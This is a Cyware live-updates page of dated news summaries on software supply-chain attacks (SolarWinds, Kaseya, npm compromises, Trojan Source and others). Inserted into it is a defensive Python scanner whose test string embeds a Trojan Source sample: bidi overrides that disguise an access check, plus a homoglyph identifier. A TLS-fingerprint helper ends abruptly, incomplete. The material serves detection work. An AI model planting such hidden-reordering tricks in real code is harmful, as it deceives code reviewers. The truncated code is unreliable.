Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More

An alleged Russia-backed hacking group is believed to have targeted and breached the U.S. Departments of Treasury and Commerce. According to Reuters, the breach originated from a supply chain attack that leveraged Orion - the widely-used network monitoring tool from SolarWinds, an IT company that supports several federal agencies and the U.S. military. Last week, cybersecurity company FireEye had reported a similar attack carried out via the SolarWinds platform that led to the compromise of its “red teaming” tools. It is believed that a large number of organizations that use this software might be at risk. The malware used in this widespread "UNC2452" campaign is being tracked by several names including Solorigate and SUNBURST.

Cyware has created this resource to collect and share live alerts on this campaign, impacted organizations as reported in the media, indicators of compromise (IOCs), and other relevant threat intelligence. We are actively working to keep this page updated and accurate in order to ensure that it is timely and relevant to as many people as possible.

_______________________________________________________________________________________

(Dec 3, 2021)

SolarWinds Attack: One Year Later, Cybersecurity Lessons for Pros

Several analysts and cybersecurity watchers agree that software and IT supply chains, along with vulnerabilities associated with third-party suppliers, remain the greatest lesson learned from this past year’s events. And while software developers have been asking the right questions and trying to adapt, adversaries continue to adjust their techniques to remain that crucial step ahead.

Ref - Dice 

_______________________________________________________________________________________

(Dec 3, 2021)

72% of MSPs Take Action After Headline About Cyber Attack

As a result of the SolarWinds incident, among those MSPs who were affected (28%), almost all (98%) took at least some action to respond to the incident and prevent more attacks in the future. The most common steps were switching to other IT security software providers (44%), updating contract terms and liability with suppliers (42%), and hiring additional security experts (39%).

Ref -  Kaspersky 

_______________________________________________________________________________________

(Dec 2, 2021)

Maximize Security by Managing Versioning Based on Attack Potential

On October 22, NPM and GitHub announced that the popular UA-Parser-JS library had been hijacked for distributing malware. Some of the world’s most popular software applications use the library, from the likes of Apple, Mozilla, Elastic, and Facebook. This attack demonstrated how attackers can easily weaponize a small piece of the software supply chain on a global scale.

 
_______________________________________________________________________________________

(Dec 2, 2021)

Securing the Modern Software Supply Chain

Collective safety concerns are a vital issue when openly collaborating on and engaging with open-source software. These actions increase the risk of accidentally leaking or sharing confidential information that is then exposed to the public eye. To avoid this potential data exposure, developers should not be storing sensitive information in a repository, in config or code.


_______________________________________________________________________________________

(Dec 1, 2021)

Why Protection Against Supply Chain Attacks is a Must

It’s no wonder, then, that over two-thirds of all the code running on the average website today comes from third parties. And here is where security concerns arise. In the context of a website, every single piece of third-party code has the exact same permissions as any remaining code that was developed internally.


_______________________________________________________________________________________

(Nov 30, 2021)

A Multipronged Approach to Protect ICT Supply Chains from Cyberattacks

Given the integrated nature of ICT supply chain resilience, there is a need to develop core principles, technical standards, and regulatory frameworks to ensure a consistent level of cybersecurity. Governments must continue to drive nationwide efforts to establish a baseline level of cybersecurity across sectors through laws, regulations, guidelines, training requirements, and awareness-building.


_______________________________________________________________________________________

(Nov 30, 2021)

Defending the Global Software Supply Chain from Cyberattacks in 2021

In 2021, Linux Foundation’s communities rose to the challenge of providing tools and best practices for the security hardening of the global software supply chains. Its efforts included launching Open Source Security Foundation (OpenSSF) as a funded project, expanding Let’s Encrypt, ensuring the ISO standardization of SPDX as the SBOM standard, directing funds to identify and fix vulnerabilities in critical open source software, and building a new training curriculum to improve secure coding practices.


_______________________________________________________________________________________

(Nov 29, 2021)

Thousands of GitHub Users Unknowingly Risking Account Takeovers and Supply Chain Attacks

Login cookies of thousands of Firefox users are available on request from GitHub repositories, according to security engineer Aidan Marlin. Marlin, an employee of the London-based rail service Trainline, contacted GitHub about the leak, but the company responded that user-leaked credentials were beyond the scope of its bounty program.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Nov 23, 2021)

Supply Chain Attacks, Ransomware will Again Make Headlines in 2022

The European Union Agency for Cybersecurity (ENISA) predicted that supply chain attacks would quadruple in 2021 compared to last year. ENISA’s report, Threat Landscape for Supply Chain Attacks, analyzed 24 recent attacks and found that strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers.

Ref - Tech HQ 

_______________________________________________________________________________________

(Nov 23, 2021)

Clearing up Confusion on Supply Chain Attacks

A Zero Trust approach addresses many of the security concerns around supply chain attacks – not necessarily to prevent them but to contain the spread of malware and “massively limit the amount of damage” that can occur. To reduce risk and potentially prevent an attack from significantly impacting your business, organizations need to shift from a reactive to a proactive approach to cybersecurity.

Ref - CSO Online 

_______________________________________________________________________________________

(Nov 22, 2021)

Effective Software Security Activities for Managing Supply Chain Risks

The BSIMM12 report highlights how companies are responding and illustrates the software security activities adopted by companies in the BSIMM community over the last year. According to the report, the U.S. National Institute of Standards and Technology (NIST) has developed a Cyber Supply Chain Risk Management (C-SCRM) and Secure Software Development Framework that provides recommendations on how to manage supply chain risk.

Ref - Synopsys 

_______________________________________________________________________________________

(Nov 20, 2021)

Know The Risks Posed By Your Third Parties And Supply Chain

Only 41% of Canadian survey respondents (40% globally) say they thoroughly understand the risk of data breaches through third parties, using formal enterprise-wide assessments. Nearly a quarter in Canada and globally have little or no understanding of all of these risks—a major blind spot of which cyber attackers are well aware and willing to exploit.

Ref - PwC 

_______________________________________________________________________________________

(Nov 19, 2021)

Open-source Leaders Seek To Fill the Gaps in Software Supply Chain Security

The challenge of protecting open-source software, which is built by many contributors, is akin to securing a bank vault where everyone is free to come and go as they please. What’s inside is extremely valuable, but there are no guards or locks on the vault door. Enterprises have a desire to put in additional controls and analysis for software supply chain security to reduce risk. One of the problems is that open source is so pervasive.


_______________________________________________________________________________________

(Nov 19, 2021)

Palo Alto’s Unit 42: Poor Supply Chain Hygiene Impacts Cloud Infrastructure

Palo Alto Networks’ in-house threat research team, Unit 42, analyzed data from a variety of public data sources around the globe and came up with conclusions about the growing threats the software supply chains of organizations face daily. Their findings indicate that many organizations may have a false sense of security in the cloud and, in reality, are vastly unprepared for the threats they face.


_______________________________________________________________________________________

(Nov 18, 2021)

The UK Pushes For Better Supply Chain Cybersecurity

If the UK Government gets its way, IT service vendors and other cloud-based service providers may soon be required to adopt new measures to strengthen their cybersecurity, amid rising concerns about supply chain risks. The Department for Digital, Culture, Media, and Sport (DCMS) has floated plans to make mandatory compliance with the National Cyber Security Centre’s Cyber Assessment Framework, which provides guidance for organizations responsible for vitally important services and activities.

Ref - Tripwire 

_______________________________________________________________________________________

(Nov 18, 2021)

Supply Chain Security Fears Escalate as Iranian APTs Caught Hitting IT Services Sector

Two of Redmond’s premier threat hunting units, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU), are sounding the alarm for a series of intrusions at companies that sell business management and integration software to millions of global organizations. Once inside the IT services organizations, Microsoft said the Iranian hackers are extending their attacks to compromise downstream customers, much like the SolarWinds supply chain mega-hack that snagged thousands of corporate victims globally.

 
_______________________________________________________________________________________

(Nov 18, 2021)

Iranian Targeting Of IT Sector On The Rise

Microsoft has observed multiple Iranian threat actors targeting the IT services sector in attacks that aim to steal sign-in credentials belonging to downstream customer networks to enable further attacks. This activity is notable because targeting third parties has the potential to exploit more sensitive organizations by taking advantage of trust and access in a supply chain. 

Ref - Microsoft 

_______________________________________________________________________________________

(Nov 18, 2021)

From Growing Supply Chain Attacks To Ransomware Gangs: Top Cybersecurity Predictions for 2022

According to HP’s report on Top Cybersecurity Predictions for 2022, supply chain attacks are likely to continue to present new opportunities for threat actors in 2022. Both SMBs and high-profile victims may be targeted. Kaseya demonstrated a pathway to monetization for independent software vendor (ISV) breaches. This should be a wake-up call to all ISVs that even if their customer base doesn’t consist of enterprise and government customers, they can still be caught in the crosshairs of attackers looking to exploit their customers.

Ref - HP 

_______________________________________________________________________________________

(Nov 17, 2021)

SolarWinds Actors Are Scoping Out Hub Companies To Go After Prized Targets

The Russian APT group known as Cozy Bear doesn’t hibernate for long, and in late October Microsoft warned that the nation-state actor was trying to replicate the success of its SolarWinds supply chain attack — this time by compromising IT resellers and tech/cloud service providers and then impersonating them in order to target their customers.

Ref - SC Magazine 

_______________________________________________________________________________________

(Nov 17, 2021)

Symantec Security Summary - Supply Chain Attacks Are Surging

Supply chain attacks are surging, according to data breach reports. New information from the Identity Theft Resource Center (ITRC) claims that a total of 793,000 more individuals have been affected by supply chain attacks this year so far than in all of 2020. The North Korean group Lazarus (aka Appleworm) is the latest to mount software supply chain attacks, according to new research from Kaspersky.

Ref - Symantec

_______________________________________________________________________________________

(Nov 17, 2021)

Cyber-risk Driven by Ransomware, Supply Chain Attacks, and Trojans

FS-ISAC, a global cyber-intelligence sharing community focused on financial services, has announced that ransomware and supply chain attacks, as well as the resurgence of banking trojans and distributed denial of service (DDoS) attacks, are the top cybersecurity threats to financial institutions across the Asia Pacific (APAC) region.

Ref - FS-ISAC, Inc 

_______________________________________________________________________________________

(Nov 16, 2021)

Government Plans Regulation to Bolster Supply Chain Security

Government regulation could be on the way to force improvements in supply chain security after industry feedback and new research pointed to gaps in protection. The government trailed several possible “interventions” to improve the situation, including providing more advice and guidance, improved access to a skilled workforce and the right products, and regulation — which was reportedly described as “very effective” by more respondents than any other option.


_______________________________________________________________________________________

(Nov 16, 2021)

New Type of Supply Chain Attack Could Put Popular Admin Tools at Risk

Joint research by Intezer and Checkmarx describes ChainJacking, a type of software supply chain attack that could potentially be exploited by threat actors and puts common admin tools at risk. By slipping through the cracks between the designs of GitHub and the Go package manager, an attacker could take control over popular Go packages, poison them, and infect both developers and users.

Ref - Intezer 

_______________________________________________________________________________________

(Nov 16, 2021)

Majority of UK's Top Business Leaders Are Failing To Manage Supply Chain Security Risks

Fresh research from the Department for Culture, Media, and Sport (DCMS) has revealed less than a third of business leaders in the UK's top companies are actively managing cyber security risks in the supply chain. Just 28% of respondents replied strongly in favor when asked if they actively manage vulnerabilities in the supply chain, despite 97% of businesses being impacted by supply chain attacks in the past year.

Ref - IT Pro 

_______________________________________________________________________________________

(Nov 16, 2021)

How Self-Learning AI Protects McLaren Racing From Supply Chain Attacks

McLaren Racing recently witnessed a cyber attack in which 12 employees were targeted in a systematic phishing attack: they received an email from a long-established team supplier notifying them that a voicemail had been left for them. The link to play the voicemail led to a legitimate-looking voicemail service site. When an employee followed the link to access the message, the site requested Office 365 credentials to authenticate the user, a step designed to harvest McLaren Racing credentials.

Ref - DarkTrace 

_______________________________________________________________________________________

(Nov 15, 2021)

Home Affairs Launches New Principles For Critical Technology Supply Chain Security

The federal government has released a new set of voluntary principles aimed at providing guidance to organizations in how they protect critical technologies from cyber attacks. Labeled the Critical Technology Supply Chain Principles, Minister of Home Affairs Karen Andrews said the voluntary principles were designed to give organizations and consumers the confidence to allocate more resources towards critical emerging technologies such as artificial intelligence, quantum computing, blockchain, and algorithmic automation.

Ref - ZDNet 

_______________________________________________________________________________________

(Nov 15, 2021)

Call for Views on Cyber Security in Supply Chains and Managed Service Providers

The UK Government has issued a ‘Call for Views’ that focuses on further understanding two aspects of supply chain cyber security. Part 1 seeks input on how organizations across the market manage supply chain cyber risk and what additional government intervention would enable organizations to do this more effectively. Part 2 then seeks input on the suitability of a proposed framework for Managed Service Provider security and how this framework could most appropriately be implemented to ensure adequate baseline security to manage the risks associated with Managed Service Providers.

Ref - GOV.uk 

_______________________________________________________________________________________

(Nov 15, 2021)

Hackers Are Threatening The Global Supply Chain

As the global supply chain struggles from the aftershocks of the pandemic, spreading the suffering to nearly every industry, cyber-criminal vultures are descending on the vulnerabilities to create more dangerous disruption. According to a report from cyber intelligence firm Intel 471, all key sectors in the global supply chain are now being targeted by cybercriminals. 

Ref - Yahoo 

_______________________________________________________________________________________

(Nov 15, 2021)

3 Reasons To Use A Zero-trust Approach For Supply Chain Cybersecurity

Rather than assuming that a company or product is secure, a zero-trust approach requires verification for all assets, user accounts, or applications — the authentication for their access to your systems must be approved. Even users within your own technology infrastructure must confirm their data every time they request access to any resource inside or outside the network.


_______________________________________________________________________________________

(Nov 13, 2021)

MSPAlliance Leadership Council Forms Vendor Council to Address Managed Services Supply Chain Risk

The International Association of Cloud & Managed Service Providers (MSPAlliance) announced several significant breakthroughs in the fight against managed services supply chain vendor attacks. Among the most significant announcements is the creation of Vendor Verify, a new certification designed to raise transparency and cybersecurity resiliency amongst supply chain vendors commonly used by managed service providers (MSPs).

Ref - DarkReading 

_______________________________________________________________________________________

(Nov 11, 2021)

Supply Chains Facing New 'Backdoor' Cyberattack Peril

The global supply chain is facing a new form of cyberattack: the ‘hub attack’, where hackers target businesses seemingly unconnected to supply as a means of gaining back-door access to high-value supply targets. Such companies - in fields such as insurance, credit clearing, and SaaS - can provide thousands of links to potentially more-valuable suppliers and large customers, such as banks and companies in the energy and weapons sectors.


_______________________________________________________________________________________

(Nov 11, 2021)

How to Prevent Supply Chain Attacks with the Zero Trust Architecture (ZTA)

The components of a Zero Trust Architecture (ZTA) can either reside onsite or through a cloud-based service. All unverified network activity is fed between the Policy Decision Point and the Policy Enforcement Point. Only requests that pass strict Policy Engine requirements are permitted to flow through to all Enterprise Resources. 

Ref - Upguard

_______________________________________________________________________________________

(Nov 11, 2021)

Why Social Graphing Won’t Protect From Supply Chain Compromise

Social graphs work by comparing emails against risk criteria to determine if a particular email message is potentially dangerous in the context it’s being sent in. But in supply chain compromise situations, the email address used won’t set off alarm bells because it is a legitimate email account. Cybercriminals who gain unauthorized access to an authentic email account can entirely bypass social graph safeguards. 

Ref - Forbes 

_______________________________________________________________________________________

(Nov 11, 2021)

GoCD Bug Chain Provides Second Springboard for Supply Chain Attacks

The maintainers of GoCD, a widely used, open-source tool that automates the continuous delivery (CD) of software, have addressed three vulnerabilities that, if chained, could lead to the underlying server being taken over. The security flaws, comprising CVE-2021-43288, CVE-2021-43286, and CVE-2021-43289, could lead to supply chain attacks.

 
_______________________________________________________________________________________

(Nov 11, 2021)

Popular npm Library Compromised in a Supply Chain Attack - Additional Research

In late October, a supply chain attack affected a popular npm library, ua-parser-js, which put many companies at risk of compromise. In this incident, attackers inserted malicious code into three versions of the popular npm library ua-parser-js after seemingly taking over the developer’s npm account. In this attack, the attacker flooded the developer’s email account with hundreds of spam emails (called an email bomb attack).

Ref - AquaSec 

_______________________________________________________________________________________

(Nov 11, 2021)

Javascript – Website Supply Chain Puts Online Retail At Risk

As website supply chains become more complex and opaque, it’s difficult for organizations to establish precisely how many of these integrations are running on their websites – or who owns and manages them. A lot of the time, they’re added by marketing or web teams, outside the software development lifecycle, often bypassing code reviews and testing. Because security teams are rarely part of the development cycle, they lack insight into when and where third-party code is used.

Ref - Imperva 

_______________________________________________________________________________________

(Nov 9, 2021)

Secure Software Supply Chain: Why Every Link Matters

As any company or product is just a piece in the overall software supply chain, security measures related to the supply chain can be applied on three different points: 1) Inputs: Library and package dependencies, third-party tools, software, services, or any artifact you are consuming, either public or from a private vendor. 2) Outputs: Guarantee the integrity of your deliverables and provide ways to verify the components downstream. 3) Processes and infrastructure: Protect your network, identities, credentials, signature keys, repositories, and processes.

Ref - Sysdig 

_______________________________________________________________________________________

(Nov 9, 2021)

Supply Chain Attacks Impact Nearly Every Business

ENISA, the European Union Agency for Cybersecurity, monitors supply chain attacks. They have developed a taxonomy of supply chain attacks to allow for systematic analysis[1]. The taxonomy is based on four fundamental elements of a supply chain attack: 1) Attack technique used to compromise the supplier, 2) Supplier assets targeted, 3) Attack technique used to compromise the customer, and 4) Customer assets targeted.


_______________________________________________________________________________________

(Nov 7, 2021)

A Journey in Organizational Resilience: Supply Chain and Third Parties

In 2021, ISO reviewed and made current ISO 28001: Security management systems for the supply chain - Best practices for implementing supply chain security, assessments and plans - Requirements and guidance. And for some extremely detailed guidance, including some control mapping back to NIST SP 800-53, those concerned with supply chains can reference NIST SP 800-161 Supply Chain Risk Management Practices for Federal Information Systems and Organizations.


_______________________________________________________________________________________

(Nov 7, 2021)

Two NPM Packages With 22 Million Weekly Downloads Found Backdoored

Two popular NPM packages with cumulative weekly downloads of nearly 22 million were found to be compromised with malicious code by gaining unauthorized access to the respective developer's accounts. The two libraries in question are "coa," a parser for command-line options, and "rc," a configuration loader, both of which were tampered with by an unidentified threat actor to include "identical" password-stealing malware.


_______________________________________________________________________________________

(Nov 7, 2021)

Supply Chain Under Attack As 'Dark' Cyber Underground Peddles Sensitive Company Data

Cyber thieves have gotten hold of the credentials by leveraging vulnerabilities in remote access technologies such as Remote Desktop Protocol (RDP), Virtual Private Networks (VPN), Citrix, and SonicWall, among others, Intel 471 said. As of 2020, all four of the largest global maritime shipping companies had been hit by cyber attacks. 

Ref - FoxBusiness 

_______________________________________________________________________________________

(Nov 5, 2021)

Best Practices For A Secure Software Supply Chain

The use of open source today is significant and is not expected to slow down anytime soon. Given that we are not going to stop using open-source software, the threat to supply chain security is unpatched software. Various tools and techniques are provided by NuGet and GitHub, such as the NuGet dependency graph, which can be used to address potential risks inside a project.

Ref - Microsoft 

_______________________________________________________________________________________

(Nov 5, 2021)

Cybercriminals are Targeting Open Source Supply Chain

After years of attacking networks and custom software, enterprising hackers found an easier attack vector and switched to attacking the application development process itself. Even better, attackers need not break into an organization’s source repository. Instead, they simply add their malicious code to common open-source projects used by organizations and wait for the developers to add the code to proprietary applications themselves.

Ref - Foley 

_______________________________________________________________________________________

(Nov 5, 2021)

North Korean Lazarus Hacking Group Leverages Supply Chain Attacks To Distribute Malware 

North Korean threat actor Lazarus group has resorted to supply chain attacks similar to SolarWinds and Kaseya to compromise the regime’s targets. Kaspersky’s Q3 2021 APT Trends report says that Lazarus developed an infection chain that stemmed from legitimate South Korean security software deploying a malicious payload.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Nov 4, 2021)

Controlling the Supply Chain Attack Supplier Shockwave

Knowing your suppliers is key when it comes to understanding and assessing the supply chain to isolate blind spots and protect against looming threats. To ensure infosec can protect IT ecosystems, for example, it’s important to know whether your suppliers are asynchronous, synchronous, or a technology or service provider.

Ref - Teiss 

_______________________________________________________________________________________

(Nov 4, 2021)

Cybercriminals Increase Attacks on Vulnerable Retailers as Global Supply Chain Crisis Worsens

Cybercriminals are increasing attacks on vulnerable retailers as the global supply chain crisis continues, according to Imperva. The cybersecurity firm has released the State of Security Within eCommerce report, a 12-month analysis on cybersecurity risks in the retail industry that suggests that the 2021 holiday shopping season will be further disrupted by cybercriminals looking to create chaos and take advantage of an unprecedented global supply chain crisis.


_______________________________________________________________________________________

(Nov 3, 2021)

Supply Chain Attacks Emphasize the Need to Stay Careful with Third-party Providers

There are three major supply chain security threats that organizations and governments need to be aware of. Data protection is vital in certain industries such as health care, fintech, and e-commerce, but with these industries ever-growing and profitable, attackers and bad actors have plenty of incentive to launch attacks. Organizations must use best practices for handling threats and enforce new standards on how their employees and suppliers access and share data. Moreover, although better products are good for the market, working with external partners also increases the risk to the supply chain.


_______________________________________________________________________________________

(Nov 3, 2021)

Linux Foundation adds software supply chain security to LFX

To address the growing threat of software supply chain attacks, the Linux Foundation is upgrading its LFX Security module to deal with these attacks. Enhanced and free to use, LFX Security makes it easier for open-source projects to secure their code. Specifically, the LFX Security module now includes automatic scanning for secrets-in-code and non-inclusive language.

Ref - ZDNet

_______________________________________________________________________________________

(Nov 3, 2021)

Attackers flaunt remote access credentials, threaten supply chain

Network access brokers, the cybercriminals who trade in credentials needed to compromise corporate computers, have advertised and sold credentials for a variety of global shipping and logistics companies in the past few months, threatening the already-overburdened supply chain infrastructure. Threat intelligence firm Intel 471 reports that targeted organizations include a Japanese container shipping firm, trucking and transportation companies in the United States, and a logistics firm in the United Kingdom.


_______________________________________________________________________________________

(Nov 2, 2021)

Trojan Source bugs may lead to extensive supply-chain attacks on source code

Cambridge University researchers have detailed a new way targeted vulnerabilities can be introduced into source code while making them invisible to human code reviewers, allowing for extensive supply-chain attacks. CVE-2021-42574 is a vulnerability in the bidirectional algorithm in the Unicode Specification. CVE-2021-42694 is an exploitable issue in the character definitions of the Unicode Specification.


_______________________________________________________________________________________

(Nov 1, 2021)

Businesses and governments urged to take action over Trojan Source supply chain attacks

Businesses and governments have been urged to take action to protect themselves against hacking attacks that are capable of injecting invisible backdoors into the source code of widely used programming languages. Trojan Source attacks can be used by hackers or hostile states to launch powerful attacks against software supply chains by depositing doctored code in libraries and software repositories such as GitHub.
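The two Trojan Source entries above (Nov 2 and Nov 1) describe the technique only in outline. As an added defensive illustration, not code from Cyware or from the Cambridge researchers, the scanner below flags the two signals the CVEs turn on: Unicode bidirectional control characters anywhere in a source line (CVE-2021-42574) and identifiers that mix letters from more than one script, the homoglyph pattern (CVE-2021-42694). The set of bidi controls and the sample input are assumptions constructed for the example.

```python
import re
import unicodedata

# Unicode bidirectional control characters that Trojan Source abuses to make
# the displayed order of a line differ from the order the compiler reads.
# (Assumption: this is the standard Unicode set; the page names only the CVEs.)
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",
    "\u2069": "PDI",
}

# Identifier-like tokens: a letter or underscore followed by word characters.
IDENT_RE = re.compile(r"[^\W\d]\w*")


def script_of(ch):
    """Coarse script bucket derived from the Unicode character name."""
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN"):
        if name.startswith(script):
            return script
    return "OTHER"


def scan_source(text):
    """Return findings for bidi controls (CVE-2021-42574 style) and for
    identifiers mixing scripts, i.e. homoglyph candidates (CVE-2021-42694)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        # Any bidi control in source is suspicious: reviewers see reordered
        # text, while the compiler consumes the logical character order.
        for col, ch in enumerate(line, 1):
            if ch in BIDI_CONTROLS:
                findings.append({
                    "line": lineno, "col": col, "kind": "bidi",
                    "detail": f"U+{ord(ch):04X} {BIDI_CONTROLS[ch]}",
                })
        # An identifier drawing letters from more than one script is the
        # classic homoglyph pattern (e.g. a Cyrillic letter in a Latin name).
        for match in IDENT_RE.finditer(line):
            ident = match.group(0)
            scripts = {script_of(c) for c in ident if c.isalpha()}
            scripts.discard("OTHER")
            if len(scripts) > 1:
                findings.append({
                    "line": lineno, "col": match.start() + 1,
                    "kind": "mixed-script", "detail": ident,
                })
    return findings


def scan_file(path):
    """Scan one file on disk; same findings as scan_source, keyed by path."""
    with open(path, encoding="utf-8") as fh:
        return {path: scan_source(fh.read())}


# Constructed sample (not from the page): line 2 carries bidi controls inside
# a comment, where they would reorder what a reviewer sees; line 4 defines a
# function whose name contains Cyrillic U+0435 in place of Latin "e".
SAMPLE = (
    "access_level = 'user'\n"
    "if access_level != 'none': # \u202e\u2066 check if admin\u2069\u2066\n"
    "    print('You are an admin')\n"
    "def sayH\u0435llo():\n"
    "    pass\n"
)

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"line {f['line']} col {f['col']}: {f['kind']} {f['detail']}")
```

Running the scanner as a pre-commit or CI check catches both classes before a reviewer ever opens the diff; the mixed-script rule is a heuristic and legitimately multilingual code bases will need an allow list.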


_______________________________________________________________________________________

(Nov 1, 2021)

Dissecting supply chain attacks in the aftermath of the SolarWinds hack

A major reason why such attacks were left untended is a lack of constant visibility and monitoring over the organization’s entire network. Large multinationals have some of the most complex security policies that one can ever witness, with a veritable bedlam of tools that create an intricate web of vulnerabilities. In addition, multiple tools being used to secure multiple assets leads to an opaque environment in terms of visibility.

Ref - IndiaTimes 

_______________________________________________________________________________________

(Nov 1, 2021)

Bolstering cybersecurity risk management with SBOMs

On May 12, 2021, the White House issued a formal executive order (EO) 14028 aimed at fortifying the nation’s cybersecurity posture, including enhancing software supply chain security. And in October 2021, the DHS Software Supply Chain Risk Management Act of 2021 was passed by the U.S. House of Representatives in a 412-2 vote. Under the bill, the Under Secretary for Management will be required to issue department-wide guidelines for identifying materials used in software development.

Ref - Forbes 

_______________________________________________________________________________________

(Oct 29, 2021)

SolarMarker attackers use SEO poisoning to push malicious code

Cybercriminals leveraging the SolarMarker .NET-based backdoor are using a technique called SEO poisoning to drive malicious payloads into victims’ systems so they can gain access to the credentials and data within. According to researchers at Menlo Security, the SolarMarker campaign is one of two such efforts they’ve seen in recent months using SEO poisoning to deceive users and get them to download the malicious payload into their systems.


_______________________________________________________________________________________

(Oct 29, 2021)

Russian hackers behind SolarWinds attack actively targeting tech supply chains - Microsoft

Microsoft’s security researchers find that the Russian hackers behind the devastating SolarWinds attack are putting a particular emphasis on IT services resellers, impersonating them to compromise their downstream customers. It is believed that the campaign’s focus is on installing backdoors for long-term use in intelligence gathering on subjects of interest to the Russian government.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Oct 28, 2021)

Many businesses are concerned about a ransomware supply chain attack

Businesses may have solid cybersecurity protections in place, keeping them safe from malware, ransomware, and various social engineering attacks. However, many are under the impression that they could easily be attacked via the supply chain, and that in some cases, an attack would be “unavoidable”. Surveying 1,001 IT managers for the report, Osirium found that three-quarters (77 percent) worry about ransomware risks through the supply chain, a figure that rises to 82 percent when the company depends on outsourced IT services.


_______________________________________________________________________________________

(Oct 28, 2021)

3 Security lessons learned from the Kaseya ransomware attack

Organizations can better prepare themselves and their customers for these attacks with some strategies to identify threats before they become a widespread issue. Organizations should trust no one and follow Zero Trust as a prevention mechanism. They should have an effective incident response plan with clearly defined policies. They must also share threat information to maintain a proactive security posture.

Ref - Dark Reading 

_______________________________________________________________________________________

(Oct 28, 2021)

Critical flaw in GoCD provides a platform for supply chain attacks

A critical vulnerability in popular CI/CD tool GoCD could allow unauthenticated attackers to extract encrypted secrets and poison software build processes – potentially paving the way to supply chain attacks. The maintainers of the open-source, Java-built platform have addressed the arbitrary file read flaw along with several other bugs discovered by Swiss security firm SonarSource.

Ref - PortSwigger 

_______________________________________________________________________________________

(Oct 27, 2021)

Lazarus APT uses updated malware in potential supply chain attacks

Researchers with Kaspersky, in their APT trends report for the third quarter of 2021, said the Lazarus group leveraged an updated version of the DeathNote malware, which is known to send data about the compromised host and fetch a next-stage payload, as well as the Racket downloader. Through these attacks, the group was able to execute a malicious payload against a think tank in South Korea, the researchers said.

Ref - Duo 

_______________________________________________________________________________________

(Oct 27, 2021)

The time has come to embrace the Zero-Trust model of cybersecurity

The Zero-Trust model has been widely recognized as an effective approach to prevent data breaches and mitigate the risk of supply chain attacks. Now is the time to embrace Zero-Trust, as the pandemic accelerates the adoption of Cloud and remote working technologies, and businesses grapple with more stringent regulation. There is no silver bullet product and no unique way to implement Zero-Trust; it requires a layered security approach that covers the entire digital infrastructure.

Ref - Weforum 

_______________________________________________________________________________________

(Oct 27, 2021)

North Korea's Lazarus group turns to supply chain attacks

Security researchers from Kaspersky recently discovered two separate campaigns where the Lazarus Group infiltrated the network of an IT company — likely as part of a broader strategy to compromise its downstream customers. In one of the incidents, Lazarus Group gained access to a South Korean security software vendor's network and abused the company's software to deploy two remote access Trojans (RATs) called Blindingcan and Copperhedge on a South Korean think tank's network.

Ref - Dark Reading 

_______________________________________________________________________________________

(Oct 25, 2021)

Check Point Software 2022 cybersecurity predictions

It is predicted that supply chain attacks will become more common and governments will begin to establish regulations to address these attacks and protect networks. They will also look into collaborating with the private sector as well as other countries to identify and target more threat groups operating on a global and regional scale.

Ref - Check Point 

_______________________________________________________________________________________

(Oct 25, 2021)

Supply chain cyberattacks causing ‘staggeringly high’ damage

Research from cybersecurity company BlueVoyant showed just how much companies are struggling to deal with these supply chain cyberattacks. The research, detailed in a recent study conducted by Opinion Matters and overseen by BlueVoyant, was the second global survey into how companies are handling third-party cyber-risks. The study polled over 1,200 high-ranking technology executives in a variety of industries in six countries: the U.S., Canada, Germany, The Netherlands, the United Kingdom, and Singapore.

Ref - TechGenix 

_______________________________________________________________________________________

(Oct 24, 2021)

New activity from Russian actor Nobelium

Nobelium attackers are active again, and now attacking a different part of the supply chain: resellers and other technology service providers that customize, deploy, and manage cloud services and other technologies on behalf of their customers. Microsoft believes Nobelium ultimately hopes to piggyback on any direct access that resellers may have to their customers’ IT systems and more easily impersonate an organization’s trusted technology partner to gain access to their downstream customers.

Ref - Microsoft 

_______________________________________________________________________________________

(Oct 22, 2021)

53% of companies are left exposed to supply chain attacks

Acronis has released its annual Cyber Readiness Report this week, providing a comprehensive overview of the modern cybersecurity landscape. Based on findings from this year's independent survey of 3,600 IT managers and remote employees in 18 countries across the globe, the report states that 53% of global companies have a false sense of security when it comes to supply chain attacks.

Ref - The Week

_______________________________________________________________________________________

(Oct 22, 2021)

Supply chain attack: NPM library used by Facebook and others was compromised

The developer of the ‘ua-parser-js’ NPM package has found that attackers had uploaded a version of his software that contained malware for both Linux and Windows computers. The malicious versions were found to steal data (including passwords and Chrome cookies, perhaps much more) from computers or run a crypto-currency miner. This prompted GitHub to issue a Critical Severity Security Advisory.

Ref - Hack A Day 

_______________________________________________________________________________________

(Oct 21, 2021)

Detecting anomalies with TLS fingerprints could pinpoint supply chain compromises

Researchers from security analytics firm Splunk have recently analyzed several such techniques that rely on building unique fingerprints to identify which software applications establish HTTPS connections. The premise is that malware programs, regardless of how they're delivered, often come with their own TLS libraries or TLS configuration and their HTTPS handshakes would be identifiable in traffic logs when compared to TLS client hashes of pre-approved applications.
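The article describes comparing TLS client hashes against pre-approved applications without showing the mechanics. As an added example, not from Splunk's research or the article, here is a JA3-style fingerprint (MD5 over the ClientHello's version, cipher suites, extensions, curves and point formats, with GREASE values removed; the choice of JA3 is an assumption, the article names no specific scheme) computed for constructed handshake records and checked against a baseline of approved client fingerprints:

```python
import hashlib

# GREASE values (RFC 8701) are randomised per connection and must be dropped,
# otherwise the same client would produce a different fingerprint every time.
GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}


def ja3_string(version, ciphers, extensions, curves, point_formats):
    """Build the JA3 input: version,ciphers,extensions,curves,point_formats (lists joined with '-')."""
    def join(values):
        return "-".join(str(v) for v in values if v not in GREASE)
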